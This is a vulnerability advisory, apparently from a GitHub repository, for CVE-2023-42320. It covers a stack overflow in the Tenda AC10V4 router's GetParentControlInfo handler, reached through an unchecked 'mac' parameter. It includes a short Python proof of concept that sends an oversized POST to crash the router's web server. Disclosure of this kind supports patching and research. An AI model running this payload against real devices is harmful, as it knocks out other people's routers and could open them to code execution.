Skip to content

Latest commit

 

History

History
40 lines (29 loc) · 1.17 KB

0.md

File metadata and controls

40 lines (29 loc) · 1.17 KB
Raw

CVE-2023-42320

vendor:Tenda

product:AC10V4

version:US_AC10V4.0si_V16.03.10.13_cn_TDC01

type:Stack Overflow

Vulnerability Description

Tenda AC10V4.0 si_V16.03.10.13_cn_TDC01 were discovered to contain a stack overflow via the mac parameter in the GetParentControlInfo function.

Vulnerability Details

In function GetParentControlInfo line 35, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution.

src0

Recurring vulnerabilities and POC

Run poc and you will see process httpd crash, segmentation fault.

import requests
    
host = "192.168.59.136:80"
cy = b'a'*1000
def exploit_GetParentControlInfo():
    url = f"http://{host}/goform/GetParentControlInfo"
    data = {
        b'mac':cy
    }
    res = requests.post(url=url,data=data)
    print(res.content)
exploit_GetParentControlInfo()

src1